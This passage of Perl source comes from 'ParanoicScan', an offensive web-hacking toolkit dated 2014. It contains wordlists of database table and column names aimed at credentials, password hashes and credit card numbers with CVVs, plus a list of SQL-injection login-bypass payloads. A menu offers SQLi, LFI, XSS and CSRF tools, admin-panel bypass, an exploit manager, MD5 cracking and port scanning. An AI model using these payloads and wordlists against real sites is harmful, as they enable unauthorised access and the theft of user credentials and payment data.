675 | 'Usuarios', 'ADMIN', | |
676 | 'USERS', 'USER', | |
677 | 'MEMBER', 'MEMBERS', | |
678 | 'USUARIO', 'USUARIOS', | |
679 | 'MIEMBROS', 'MIEMBRO', | |
680 | 'USR_NAME', 'about', | |
681 | 'access', 'admin_id', | |
682 | 'admin_name', 'admin_pass', | |
683 | 'admin_passwd', 'admin_password', | |
684 | 'admin_pwd', 'admin_user', | |
685 | 'admin_userid', 'admin_username', | |
686 | 'adminemail', 'adminid', | |
687 | 'administrator_name', 'adminlogin', | |
688 | 'adminmail', 'adminname', | |
689 | 'adminuser', 'adminuserid', | |
690 | 'adminusername', 'aid', | |
691 | 'aim', 'apwd', | |
692 | 'auid', 'authenticate', | |
693 | 'authentication', 'blog', | |
694 | 'cc_expires', 'cc_number', | |
695 | 'cc_owner', 'cc_type', | |
696 | 'cfg', 'cid', | |
697 | 'clientname', 'clientpassword', | |
698 | 'clientusername', 'conf', | |
699 | 'contact', 'converge_pass_hash', | |
700 | 'converge_pass_salt', 'crack', | |
701 | 'customers_email_address', 'customers_password', | |
702 | 'cvvnumber]', 'data', | |
703 | 'db_database_name', 'db_hostname', | |
704 | 'db_password', 'db_username', | |
705 | 'download', 'e_mail', | |
706 | 'emer', 'emni', | |
707 | 'emniplote', 'emri', | |
708 | 'fjalekalimi', 'fjalekalimin', | |
709 | 'full', 'gid', | |
710 | 'group', 'group_name', | |
711 | 'hash', 'hashsalt', | |
712 | 'homepage', 'icq', | |
713 | 'icq_number', 'id', | |
714 | 'id_group', 'id_member', | |
715 | 'images', 'ime', | |
716 | 'index', 'ip_address', | |
717 | 'kodi', 'korisnici', | |
718 | 'korisnik', 'kpro_user', | |
719 | 'last_ip', 'last_login', | |
720 | 'lastname', 'llogaria', | |
721 | 'login_admin', 'login_name', | |
722 | 'login_pass', 'login_passwd', | |
723 | 'login_password', 'login_pw', | |
724 | 'login_pwd', 'login_user', | |
725 | 'login_username', 'logini', | |
726 | 'loginkey', 'loginout', | |
727 | 'logo', 'logohu', | |
728 | 'lozinka', 'md5hash', | |
729 | 'mem_login', 'mem_pass', | |
730 | 'mem_passwd', 'mem_password', | |
731 | 'mem_pwd', 'member_id', | |
732 | 'member_login_key', 'member_name', | |
733 | 'memberid', 'memlogin', | |
734 | 'mempassword', 'my_email', | |
735 | 'my_name', 'my_password', | |
736 | 'my_username', 'myname', | |
737 | 'mypassword', 'myusername', | |
738 | 'nc', 'new', | |
739 | 'news', 'number', | |
740 | 'nummer', 'p_assword', | |
741 | 'p_word', 'pass_hash', | |
742 | 'pass_w', 'pass_word', | |
743 | 'pass1word', 'passw', | |
744 | 'passwordsalt', 'passwort', | |
745 | 'passwrd', 'perdorimi', | |
746 | 'perdoruesi', 'personal_key', | |
747 | 'phone', 'privacy', | |
748 | 'psw', 'punetoret', | |
749 | 'punonjes', 'pword', | |
750 | 'pwrd', 'salt', | |
751 | 'search', 'secretanswer', | |
752 | 'search', 'secretanswer', | |
753 | 'secretquestion', 'serial', | |
754 | 'session_member_id', 'session_member_login_key', | |
755 | 'sesskey', 'setting', | |
756 | 'sid', 'sifra', | |
757 | 'spacer', 'status', | |
758 | 'store', 'store1', | |
759 | 'store2', 'store3', | |
760 | 'store4', 'table_prefix', | |
761 | 'temp_pass', 'temp_password', | |
762 | 'temppass', 'temppasword', | |
763 | 'text', 'uid', | |
764 | 'uname', 'user_admin', | |
765 | 'user_icq', 'user_id', | |
766 | 'user_ip', 'user_level', | |
767 | 'user_login', 'user_n', | |
768 | 'user_pass', 'user_passw', | |
769 | 'user_passwd', 'user_pw', | |
770 | 'user_pwd', 'user_pword', | |
771 | 'user_pwrd', 'user_un', | |
772 | 'user_uname', 'user_username', | |
773 | 'user_usernm', 'user_usernun', | |
774 | 'user_usrnm', 'user1', | |
775 | 'useradmin', 'userid', | |
776 | 'userip', 'userlogin', | |
777 | 'usern', 'usernm', | |
778 | 'userpass', 'userpassword', | |
779 | 'userpw', 'userpwd', | |
780 | 'usr_n', 'usr_name', | |
781 | 'usr_pass', 'usr2', | |
782 | 'usrn', 'usrnam', | |
783 | 'usrname', 'usrnm', | |
784 | 'usrpass', 'warez', | |
785 | 'xar_name', 'xar_pass', | |
786 | 'nom dutilisateur', 'mot de passe', | |
787 | 'compte', 'comptes', | |
788 | 'aide', 'objectif', | |
789 | 'authentifier', 'authentification', | |
790 | 'Contact', 'fissure', | |
791 | 'client', 'clients', | |
792 | 'de donn?es', 'mot_de_passe_bdd', | |
793 | 't?l?charger', 'E-mail', | |
794 | 'adresse e-mail', 'Emer', | |
795 | 'complet', 'groupe', | |
796 | 'hachage', 'Page daccueil', | |
797 | 'Kodi', 'nom', | |
798 | 'connexion', 'membre', | |
799 | 'MEMBERNAME', 'mon_mot_de_passe', | |
800 | 'monmotdepasse', 'ignatiusj', | |
801 | 'caroline-du-nord', 'nouveau', | |
802 | 'Nick', 'passer', | |
803 | 'Passw', 'Mot de passe', | |
804 | 't?l?phone', 'protection de la vie priv?e', | |
805 | 'PSW', 'pWord', | |
806 | 'sel', 'recherche', | |
807 | 'de s?rie', 'param?tre', | |
808 | '?tat', 'stocker', | |
809 | 'texte', 'cvvnumber' | |
810 | ); | |
811 | my @buscar2 = ( | |
812 | 'name', 'user', | |
813 | 'user_name', 'user_username', | |
814 | 'uname', 'user_uname', | |
815 | 'usern', 'user_usern', | |
816 | 'un', 'user_un', | |
817 | 'mail', 'cliente', | |
818 | 'usrnm', 'user_usrnm', | |
819 | 'usr', 'admin_name', | |
820 | 'cla_adm', 'usu_adm', | |
821 | 'fazer', 'logon', | |
822 | 'fazerlogon', 'authorization', | |
823 | 'membros', 'utilizadores', | |
824 | 'sysadmin', 'email', | |
825 | 'senha', 'username', | |
826 | 'usernm', 'user_usernm', | |
827 | 'nm', 'user_nm', | |
828 | 'login', 'u_name', | |
829 | 'nombre', 'host', | |
830 | 'pws', 'cedula', | |
831 | 'userName', 'host_password', | |
832 | 'chave', 'alias', | |
833 | 'apellido_nombre', 'cliente_nombre', | |
834 | 'cliente_email', 'cliente_pass', | |
835 | 'cliente_user', 'cliente_usuario', | |
836 | 'login_id', 'sistema_id', | |
837 | 'author', 'user_login', | |
838 | 'admin_user', 'admin_pass', | |
839 | 'uh_usuario', 'uh_password', | |
840 | 'psw', 'host_username', | |
841 | 'sistema_usuario', 'auth', | |
842 | 'key', 'usuarios_nombre', | |
843 | 'usuarios_nick', 'usuarios_password', | |
844 | 'user_clave', 'membername', | |
845 | 'nme', 'unme', | |
846 | 'password', 'user_password', | |
847 | 'autores', 'pass_hash', | |
848 | 'hash', 'pass', | |
849 | 'correo', 'usuario_nombre', | |
850 | 'usuario_nick', 'usuario_password', | |
851 | 'userpass', 'user_pass', | |
852 | 'upw', 'pword', | |
853 | 'user_pword', 'passwd', | |
854 | 'user_passwd', 'passw', | |
855 | 'user_passw', 'pwrd', | |
856 | 'user_pwrd', 'pwd', | |
857 | 'authors', 'user_pwd', | |
858 | 'u_pass', 'clave', | |
859 | 'usuario', 'contrasena', | |
860 | 'pas', 'sistema_password', | |
861 | 'autor', 'upassword', | |
862 | 'web_password', 'web_username', | |
863 | 'tbladmins', 'sort', | |
864 | '_wfspro_admin', '4images_users', | |
865 | 'a_admin', 'account', | |
866 | 'accounts', 'adm', | |
867 | 'admin', 'admin_login', | |
868 | 'admin_userinfo', 'administer', | |
869 | 'administrable', 'administrate', | |
870 | 'administration', 'administrator', | |
871 | 'administrators', 'adminrights', | |
872 | 'admins', 'adminuser', | |
873 | 'art', 'article_admin', | |
874 | 'articles', 'artikel', | |
875 | 'ÃÜÂë', 'aut', | |
876 | 'autore', 'backend', | |
877 | 'backend_users', 'backenduser', | |
878 | 'bbs', 'book', | |
879 | 'chat_config', 'chat_messages', | |
880 | 'chat_users', 'client', | |
881 | 'clients', 'clubconfig', | |
882 | 'company', 'config', | |
883 | 'contact', 'contacts', | |
884 | 'content', 'control', | |
885 | 'cpg_config', 'cpg132_users', | |
886 | 'customer', 'customers', | |
887 | 'customers_basket', 'dbadmins', | |
888 | 'dealer', 'dealers', | |
889 | 'diary', 'download', | |
890 | 'Dragon_users', 'e107.e107_user', | |
891 | 'e107_user', 'forum.ibf_members', | |
892 | 'fusion_user_groups', 'fusion_users', | |
893 | 'group', 'groups', | |
894 | 'ibf_admin_sessions', 'ibf_conf_settings', | |
895 | 'ibf_members', 'ibf_members_converge', | |
896 | 'ibf_sessions', 'icq', | |
897 | 'images', 'index', | |
898 | 'info', 'ipb.ibf_members', | |
899 | 'ipb_sessions', 'joomla_users', | |
900 | 'jos_blastchatc_users', 'jos_comprofiler_members', | |
901 | 'jos_contact_details', 'jos_joomblog_users', | |
902 | 'jos_messages_cfg', 'jos_moschat_users', | |
903 | 'jos_users', 'knews_lostpass', | |
904 | 'korisnici', 'kpro_adminlogs', | |
905 | 'kpro_user', 'links', | |
906 | 'login_admin', 'login_admins', | |
907 | 'login_user', 'login_users', | |
908 | 'logins', 'logs', | |
909 | 'lost_pass', 'lost_passwords', | |
910 | 'lostpass', 'lostpasswords', | |
911 | 'm_admin', 'main', | |
912 | 'mambo_session', 'mambo_users', | |
913 | 'manage', 'manager', | |
914 | 'mb_users', 'member', | |
915 | 'memberlist', 'members', | |
916 | 'minibbtable_users', 'mitglieder', | |
917 | 'movie', 'movies', | |
918 | 'mybb_users', 'mysql', | |
919 | 'mysql.user', 'names', | |
920 | 'news', 'news_lostpass', | |
921 | 'newsletter', 'nuke_authors', | |
922 | 'nuke_bbconfig', 'nuke_config', | |
923 | 'nuke_popsettings', 'nuke_users', | |
924 | 'Óû§', 'obb_profiles', | |
925 | 'order', 'orders', | |
926 | 'parol', 'partner', | |
927 | 'partners', 'passes', | |
928 | 'passwords', 'perdorues', | |
929 | 'perdoruesit', 'phorum_session', | |
930 | 'phorum_user', 'phorum_users', | |
931 | 'phpads_clients', 'phpads_config', | |
932 | 'phpbb_users', 'phpBB2.forum_users', | |
933 | 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', | |
934 | 'pma_table_info', 'poll_user', | |
935 | 'punbb_users', 'pwds', | |
936 | 'reg_user', 'reg_users', | |
937 | 'registered', 'reguser', | |
938 | 'regusers', 'session', | |
939 | 'sessions', 'settings', | |
940 | 'shop.cards', 'shop.orders', | |
941 | 'site_login', 'site_logins', | |
942 | 'sitelogin', 'sitelogins', | |
943 | 'sites', 'smallnuke_members', | |
944 | 'smf_members', 'SS_orders', | |
945 | 'statistics', 'superuser', | |
946 | 'sysadmins', 'system', | |
947 | 'sysuser', 'sysusers', | |
948 | 'table', 'tables', | |
949 | 'tb_admin', 'tb_administrator', | |
950 | 'tb_login', 'tb_member', | |
951 | 'tb_members', 'tb_user', | |
952 | 'tb_username', 'tb_usernames', | |
953 | 'tb_users', 'tbl', | |
954 | 'tbl_user', 'tbl_users', | |
955 | 'tbluser', 'tbl_clients', | |
956 | 'tbl_client', 'tblclients', | |
957 | 'tblclient', 'test', | |
958 | 'usebb_members', 'user_admin', | |
959 | 'user_info', 'user_list', | |
960 | 'user_logins', 'user_names', | |
961 | 'usercontrol', 'userinfo', | |
962 | 'userlist', 'userlogins', | |
963 | 'usernames', 'userrights', | |
964 | 'users', 'vb_user', | |
965 | 'vbulletin_session', 'vbulletin_user', | |
966 | 'voodoo_members', 'webadmin', | |
967 | 'webadmins', 'webmaster', | |
968 | 'webmasters', 'webuser', | |
969 | 'webusers', 'x_admin', | |
970 | 'xar_roles', 'xoops_bannerclient', | |
971 | 'xoops_users', 'yabb_settings', | |
972 | 'yabbse_settings', 'ACT_INFO', | |
973 | 'ActiveDataFeed', 'Category', | |
974 | 'CategoryGroup', 'ChicksPass', | |
975 | 'ClickTrack', 'Country', | |
976 | 'CountryCodes1', 'CustomNav', | |
977 | 'DataFeedPerformance1', 'DataFeedPerformance2', | |
978 | 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', | |
979 | 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', | |
980 | 'dtproperties', 'Event', | |
981 | 'Event_backup', 'Event_Category', | |
982 | 'EventRedirect', 'Events_new', | |
983 | 'Genre', 'JamPass', | |
984 | 'MyTicketek', 'MyTicketekArchive', | |
985 | 'News', 'PerfPassword', | |
986 | 'PerfPasswordAllSelected', 'Promotion', | |
987 | 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', | |
988 | 'ProxyPriceInfo', 'Region', | |
989 | 'SearchOptions', 'Series', | |
990 | 'Sheldonshows', 'StateList', | |
991 | 'States', 'SubCategory', | |
992 | 'Subjects', 'Survey', | |
993 | 'SurveyAnswer', 'SurveyAnswerOpen', | |
994 | 'SurveyQuestion', 'SurveyRespondent', | |
995 | 'sysconstraints', 'syssegments', | |
996 | 'tblRestrictedPasswords', 'tblRestrictedShows', | |
997 | 'TimeDiff', 'Titles', | |
998 | 'ToPacmail1', 'ToPacmail2', | |
999 | 'UserPreferences', 'uvw_Category', | |
1000 | 'uvw_Pref', 'uvw_Preferences', | |
1001 | 'Venue', 'venues', | |
1002 | 'VenuesNew', 'X_3945', | |
1003 | 'tblArtistCategory', 'tblArtists', | |
1004 | 'tblConfigs', 'tblLayouts', | |
1005 | 'tblLogBookAuthor', 'tblLogBookEntry', | |
1006 | 'tblLogBookImages', 'tblLogBookImport', | |
1007 | 'tblLogBookUser', 'tblMails', | |
1008 | 'tblNewCategory', 'tblNews', | |
1009 | 'tblOrders', 'tblStoneCategory', | |
1010 | 'tblStones', 'tblUser', | |
1011 | 'tblWishList', 'VIEW1', | |
1012 | 'viewLogBookEntry', 'viewStoneArtist', | |
1013 | 'vwListAllAvailable', 'CC_info', | |
1014 | 'CC_username', 'cms_user', | |
1015 | 'cms_users', 'cms_admin', | |
1016 | 'cms_admins', 'jos_user', | |
1017 | 'table_user', 'bulletin', | |
1018 | 'cc_info', 'login_name', | |
1019 | 'admuserinfo', 'userlistuser_list', | |
1020 | 'SiteLogin', 'Site_Login', | |
1021 | 'UserAdmin', 'Admins', | |
1022 | 'Login', 'Logins' | |
1023 | ); | |
1024 | ||
1025 | my @bypass = split /\n/, <<'EOS'; | |
1026 | admin'-- | |
1027 | 'or'1'='1 | |
1028 | 'or' | |
1029 | ' or 0=0 -- | |
1030 | " or 0=0 -- | |
1031 | or 0=0 -- | |
1032 | ' or 0=0 # | |
1033 | " or 0=0 # | |
1034 | or 0=0 # | |
1035 | ' or 'x'='x | |
1036 | " or "x"="x | |
1037 | ') or ('x'='x | |
1038 | ' or 1=1-- | |
1039 | " or 1=1-- | |
1040 | or 1=1-- | |
1041 | ' or a=a-- | |
1042 | " or "a"="a | |
1043 | ') or ('a'='a | |
1044 | ") or ("a"="a | |
1045 | hi" or "a"="a | |
1046 | hi" or 1=1 -- | |
1047 | hi' or 1=1 -- | |
1048 | hi' or 'a'='a | |
1049 | hi') or ('a'='a | |
1050 | hi") or ("a"="a | |
1051 | - ' or 'x'='x | |
1052 | - ' or 'x'='x | |
1053 | 'or'1 ou 'or''=' | |
1054 | ' or 'x'='x | |
1055 | admin' or 1==1 | |
1056 | ' OR "=' | |
1057 | 'or'1'='1 | |
1058 | EOS | |
1059 | ||
1060 | my @files_gen = ( | |
1061 | 'kobra', 'sql-logs.txt', | |
1062 | 'logs-bypass.txt', 'jetdb-logs.txt', | |
1063 | 'mssql-logs.txt', 'oracle-logs.txt', | |
1064 | 'rfi-logs.txt', 'lfi-logs.txt', | |
1065 | 'xss-logs.txt', 'fpd-logs.txt', | |
1066 | 'csrf', 'fsd', | |
1067 | 'paths-logs.txt', 'admin-logs.txt', | |
1068 | 'hashes-found.txt', 'http-logs.txt', | |
1069 | 'exploitdb' | |
1070 | ); | |
1071 | ||
1072 | my @files_chau_gen = ( | |
1073 | 'kobra.html', 'sqli.html', 'bypass.html', 'jetdb.html', | |
1074 | 'mssql.html', 'oracle.html', 'rfi.html', 'lfi.html', | |
1075 | 'xss.html', 'fpd.html', 'csrf.html', 'fsd.html', | |
1076 | 'paths.html', 'admin.html', 'hash.html', 'http.html', | |
1077 | 'exploitdb.html' | |
1078 | ); | |
1079 | ||
1080 | my $comienzo_html = qq( | |
1081 | <title>Logs - ParanoicScan -</title> | |
1082 | ||
1083 | <STYLE type=text/css> | |
1084 | ||
1085 | body,a:link { | |
1086 | background-color: #000000; | |
1087 | color:#00FF00; | |
1088 | Courier New; | |
1089 | cursor:crosshair; | |
1090 | font: normal 0.7em sans-serif,Arial; | |
1091 | } | |
1092 | ||
1093 | input,textarea,fieldset,select,table,td,tr,option,select { | |
1094 | font: normal 15px Verdana, Arial, Helvetica, | |
1095 | sans-serif; | |
1096 | background-color:#000000; | |
1097 | color:#00FF00; | |
1098 | border: solid 1px #00FF00; | |
1099 | border-color:#00FF00 | |
1100 | } | |
1101 | ||
1102 | a:link,a:visited,a:active { | |
1103 | color:#00FF00; | |
1104 | font: normal 15px Verdana, Arial, Helvetica, | |
1105 | sans-serif; | |
1106 | text-decoration: none; | |
1107 | } | |
1108 | ||
1109 | </style> | |
1110 | ||
1111 | <center> | |
1112 | <br><h1>Logs - ParanoicScan -</h1><br><br> | |
1113 | ); | |
1114 | ||
1115 | my $final_html = qq( | |
1116 | <br><br><h1><b>-- == (C) Doddy Hackman 2014 == --</b></h1> | |
1117 | ||
1118 | </center>); | |
1119 | ||
1120 | my $logs_index = qq( | |
1121 | <title>Logs - ParanoicScan -</title> | |
1122 | ||
1123 | <STYLE type=text/css> | |
1124 | ||
1125 | body,a:link { | |
1126 | background-color: #000000; | |
1127 | color:#00FF00; | |
1128 | Courier New; | |
1129 | cursor:crosshair; | |
1130 | font: normal 0.7em sans-serif,Arial; | |
1131 | } | |
1132 | ||
1133 | input,textarea,fieldset,select,table,td,tr,option,select { | |
1134 | font: normal 15px Verdana, Arial, Helvetica, | |
1135 | sans-serif; | |
1136 | background-color:#000000; | |
1137 | color:#00FF00; | |
1138 | border: solid 1px #00FF00; | |
1139 | border-color:#00FF00 | |
1140 | } | |
1141 | ||
1142 | a:link,a:visited,a:active { | |
1143 | color:#00FF00; | |
1144 | font: normal 15px Verdana, Arial, Helvetica, | |
1145 | sans-serif; | |
1146 | text-decoration: none; | |
1147 | } | |
1148 | ||
1149 | </style> | |
1150 | ||
1151 | <center> | |
1152 | <br><h1>Logs - ParanoicScan -</h1><br><br> | |
1153 | <table border=1> | |
1154 | <td><b>Logs</b></td><tr> | |
1155 | <td><a href=kobra.html>K0bra</a></td><tr> | |
1156 | <td><a href=sqli.html>SQLI Links</a></td><tr> | |
1157 | <td><a href=bypass.html>ByPass</a></td><tr> | |
1158 | <td><a href=jetdb.html>JetDB</a></td><tr> | |
1159 | <td><a href=mssql.html>MSSQL</a></td><tr> | |
1160 | <td><a href=oracle.html>Oracle</a></td><tr> | |
1161 | <td><a href=rfi.html>RFI</a></td><tr> | |
1162 | <td><a href=lfi.html>LFI</a></td><tr> | |
1163 | <td><a href=xss.html>XSS</a></td><tr> | |
1164 | <td><a href=fpd.html>Full Path Discloure</a></td><tr> | |
1165 | <td><a href=csrf.html>Cross Site Request Forgery</a></td><tr> | |
1166 | <td><a href=fsd.html>Full Source Discloure</a></td><tr> | |
1167 | <td><a href=paths.html>Paths</a></td><tr> | |
1168 | <td><a href=admin.html>Admins</a></td><tr> | |
1169 | <td><a href=hash.html>Hashes</a></td><tr> | |
1170 | <td><a href=http.html>HTTP FingerPrinting</a></td><tr> | |
1171 | <td><a href=exploitdb.html>ExploitDB</a></td><tr> | |
1172 | </table> | |
1173 | ||
1174 | <br><br><h1><b>-- == (C) Doddy Hackman 2014 == --</b></h1> | |
1175 | ||
1176 | </center> | |
1177 | ); | |
1178 | ||
1179 | my @logs_central = ( | |
1180 | "logs", "logs_html", | |
1181 | "logs/webs", "logs/fsdlogs", | |
1182 | "logs/csrf", "logs/exploitdb/", | |
1183 | "logs_html/webs", "logs_html/fsdlogs", | |
1184 | "logs_html/csrf", "logs_html/exploitdb/" | |
1185 | ); | |
1186 | ||
1187 | ## | |
1188 | ||
1189 | for my $log (@logs_central) { | |
1190 | mkdir( $log, 0777 ); | |
1191 | chmod $log, "0777"; | |
1192 | } | |
1193 | ||
1194 | unless ( -f getcwd() . "/logs_html/logs.html" ) { | |
1195 | open( FILE, ">>" . getcwd() . "/" . "logs_html/logs.html" ); | |
1196 | print FILE $logs_index; | |
1197 | close FILE; | |
1198 | } | |
1199 | ||
1200 | my $nave = LWP::UserAgent->new; | |
1201 | $nave->agent( $agents[ rand @agents ] ); | |
1202 | $nave->timeout(10); | |
1203 | ||
1204 | my $total_vulnerables; | |
1205 | ||
1206 | ##Test Proxy | |
1207 | ||
1208 | my $now_proxy; | |
1209 | my $te = getdatanownownownow(); | |
1210 | ||
1211 | if ( $te =~ /proxy=(.*)/ ) { | |
1212 | $now_proxy = $1; | |
1213 | $nave->proxy( "http", "http://" . $now_proxy ); | |
1214 | } | |
1215 | ||
1216 | inicio_total(); | |
1217 | ||
1218 | sub inicio_total { | |
1219 | ||
1220 | head_menu(); | |
1221 | ||
1222 | unless ( -f "data.txt" ) { | |
1223 | instalar(); | |
1224 | } | |
1225 | else { | |
1226 | ||
1227 | #Start the menu | |
1228 | my $re = menu_login(); | |
1229 | printear( "\n\n\t\t\t [+] Checking ...\n\n", "text", "7", "5" ); | |
1230 | sleep(3); | |
1231 | if ( $re eq "yes" ) { | |
1232 | estoydentro(); | |
1233 | } | |
1234 | else { | |
1235 | printear( "\n\t\t\t [-] Bad Login\n\n", "text", "5", "5" ); | |
1236 | <stdin>; | |
1237 | inicio_total(); | |
1238 | } | |
1239 | } | |
1240 | copyright_menu(); | |
1241 | } | |
1242 | ||
1243 | #Final | |
1244 | ||
1245 | sub estoydentro { | |
1246 | head_menu(); | |
1247 | menu_central(); | |
1248 | my $op = printear( "\n\n\t\t\t[+] Option : ", "stdin", "11", "13" ); | |
1249 | $SIG{INT} = \&estoydentroporahora; ## Comment on this line to compile to exe | |
1250 | if ( $op eq "1" ) { | |
1251 | load_paranoic_old(); | |
1252 | } | |
1253 | elsif ( $op eq "2" ) { | |
1254 | load_kobra(); | |
1255 | } | |
1256 | elsif ( $op eq "3" ) { | |
1257 | lfi_scan(); | |
1258 | } | |
1259 | elsif ( $op eq "4" ) { | |
1260 | xss_scan(); | |
1261 | } | |
1262 | elsif ( $op eq "5" ) { | |
1263 | csrf_scan(); | |
1264 | } | |
1265 | elsif ( $op eq "6" ) { | |
1266 | load_bypass(); | |
1267 | } | |
1268 | elsif ( $op eq "7" ) { | |
1269 | load_fsd(); | |
1270 | } | |
1271 | elsif ( $op eq "8" ) { | |
1272 | load_findpaths(); | |
1273 | } | |
1274 | elsif ( $op eq "9" ) { | |
1275 | load_locateip(); | |
1276 | } | |
1277 | elsif ( $op eq "10" ) { | |
1278 | menu_crackhash(); | |
1279 | adios(); | |
1280 | } | |
1281 | elsif ( $op eq "11" ) { | |
1282 | clean(); | |
1283 | start_panel(); | |
1284 | } | |
1285 | elsif ( $op eq "12" ) { | |
1286 | httpfinger(); | |
1287 | } | |
1288 | elsif ( $op eq "13" ) { | |
1289 | portscanner(); | |
1290 | } | |
1291 | elsif ( $op eq "14" ) { | |
1292 | encodedecode(); | |
1293 | } | |
1294 | elsif ( $op eq "15" ) { | |
1295 | exploitdb(); | |
1296 | } | |
1297 | elsif ( $op eq "16" ) { | |
1298 | mysqlman(); | |
1299 | } | |
1300 | elsif ( $op eq "17" ) { | |
1301 | load_cmd(); | |
1302 | } | |
1303 | elsif ( $op eq "18" ) { | |
1304 | cargarlogs("logs_html/logs.html"); | |
1305 | estoydentro(); | |
1306 | } | |
1307 | elsif ( $op eq "19" ) { | |
1308 | head_menu(); | |
1309 | printear( | |
1310 | "\n\n\t This program was coded By Doddy Hackman in the year 2014\n\n\n\n", | |
1311 | "text", "13", "5" | |
1312 | ); | |
1313 | <stdin>; | |
1314 | estoydentro(); | |
1315 | } | |
1316 | elsif ( $op eq "20" ) { | |
1317 | my $op = printear( "\n\n\t\t\t[+] Good Bye\n", "stdin", "7", "13" ); | |
1318 | ||
1319 | #<stdin>; | |
1320 | genlogs(); | |
1321 | exit(1); | |
1322 | } | |
1323 | else { | |
1324 | estoydentro(); | |
1325 | } #Fin de control | |
1326 | } | |
1327 | ||
1328 | sub estoydentroporahora { | |
1329 | my $op = printear( "\n\n\n\t\t[+] Press any key for return to the menu", | |
1330 | "stdin", "7", "13" ); | |
1331 | ||
1332 | #<stdin>; | |
1333 | estoydentro(); | |
1334 | } | |
1335 | ||
1336 | sub menu_central { | |
1337 | ||
1338 | printear( "\n\n\t\t\t -- == Options == --\n\n", "text", "13", "5" ); | |
1339 | printear( | |
1340 | "\n | |
1341 | \t\t\t[+] 1 : Web Scanner | |
1342 | \t\t\t[+] 2 : SQLi Scanner | |
1343 | \t\t\t[+] 3 : LFI Scanner | |
1344 | \t\t\t[+] 4 : XSS Tool | |
1345 | \t\t\t[+] 5 : CSRF Tool | |
1346 | \t\t\t[+] 6 : Bypass Admin | |
1347 | \t\t\t[+] 7 : FSD Exploit Manager | |
1348 | \t\t\t[+] 8 : Paths Finder | |
1349 | \t\t\t[+] 9 : Locate IP | |
1350 | \t\t\t[+] 10 : Crack MD5 | |
1351 | \t\t\t[+] 11 : Panel Finder | |
1352 | \t\t\t[+] 12 : HTTP FingerPrinting | |
1353 | \t\t\t[+] 13 : Port Scanner | |
1354 | \t\t\t[+] 14 : Encoder & Decoder | |
1355 | \t\t\t[+] 15 : Exploit DB Manager | |
1356 | \t\t\t[+] 16 : Mysql Manager | |
1357 | \t\t\t[+] 17 : Console | |
1358 | \t\t\t[+] 18 : Generate LOGS | |
1359 | \t\t\t[+] 19 : About | |
1360 | \t\t\t[+] 20 : Exit | |
1361 | ", "logos", "7", "5" | |
1362 | ); | |
1363 | } | |
1364 | ||
1365 | sub menu_login { | |
1366 | ||
1367 | my $test_username = ""; | |
1368 | my $test_password = ""; | |
1369 | ||
1370 | printear( "\n\n\t\t\t -- == Login == --\n\n\n\n", "text", "13", "5" ); | |
1371 | my $username = printear( "\t\t\t[+] Username : ", "stdin", "11", "13" ); | |
1372 | my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" ); | |
1373 | ||
1374 | my $word = getdatanownownownow(); | |
1375 | ||
1376 | if ( $word =~ /username=(.*)/ ) { | |
1377 | $test_username = $1; | |
1378 | } | |
1379 | ||
1380 | if ( $word =~ /password=(.*)/ ) { | |
1381 | $test_password = $1; | |
1382 | } | |
1383 | ||
1384 | if ( $test_username eq md5_hex($username) | |
1385 | and $test_password eq md5_hex($password) ) | |
1386 | { | |
1387 | return "yes"; | |
1388 | } | |
1389 | else { | |
1390 | return "no"; | |
1391 | } | |
1392 | ||
1393 | } | |
1394 | ||
1395 | sub instalar { | |
1396 | printear( | |
1397 | "\n\n\t\t\t -- == Program settings == --\n\n\n\n", "text", | |
1398 | "13", "5" | |
1399 | ); | |
1400 | ||
1401 | my $username = printear( "\t\t\t[+] Username : ", "stdin", "11", "13" ); | |
1402 | my $password = printear( "\n\t\t\t[+] Password : ", "stdin", "11", "13" ); | |
1403 | my $proxy = printear( "\n\t\t\t[+] Proxy : ", "stdin", "11", "13" ); | |
1404 | my $colores = | |
1405 | printear( "\n\t\t\t[+] Colors [y,n] : ", "stdin", "11", "13" ); | |
1406 | my $efectos = | |
1407 | printear( "\n\t\t\t[+] Effects [y,n] : ", "stdin", "11", "13" ); | |
1408 | ||
1409 | open( FILE, ">>data.txt" ); | |
1410 | print FILE "username=" . md5_hex($username) . "\n"; | |
1411 | print FILE "password=" . md5_hex($password) . "\n"; | |
1412 | if ( $proxy ne "" ) { | |
1413 | print FILE "proxy=" . $proxy . "\n"; | |
1414 | } | |
1415 | print FILE "colors=" . $colores . "\n"; | |
1416 | print FILE "efect=" . $efectos . "\n"; | |
1417 | close FILE; | |
1418 | ||
1419 | inicio_total(); | |
1420 | } | |
1421 | ||
1422 | sub head_menu { | |
1423 | clean(); | |
1424 | printear( " | |
1425 | ||
1426 | ||
1427 | @@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ | |
1428 | @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ | |
1429 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ | |
1430 | @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ | |
1431 | @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ | |
1432 | @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ | |
1433 | @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ | |
1434 | ||
1435 | ||
1436 | ", "logos", "13", "5" ); | |
1437 | ||
1438 | if ( $^O =~ /Win32/ ) { | |
1439 | ||
1440 | printear( " | |
1441 | ||
1442 | \t\t _____ | |
1443 | \t\t ,----/,--. `. | |
1444 | \t\t / '. `-' \ | |
1445 | \t\t | ____ \ '`|_ | |
1446 | \t\t \'.--._/` _ \ '. | |
1447 | \t\t /'-|/ \|`\|-` \ | |
1448 | \t\t / / \ | | |
1449 | \t\t | ; '` | .' | |
1450 | \t\t '. |;; ; / | |
1451 | \t\t \ \ ; / ,' | |
1452 | \t\t ;--, .,--, | |
1453 | \t\t __||=|=|./|=|=||___ | |
1454 | \t\t `'-'-' `-'-'` | |
1455 | \t\t ______________________ | |
1456 | \t\t /'/ / \ \ \ | |
1457 | \t\t / '.'; ; \ ' \ | |
1458 | \t\t '-/ | ; | ; \-' | |
1459 | \t\t \_| | | |_/ | |
1460 | \t\t `-'\_/`-' | |
1461 | \t\t | |
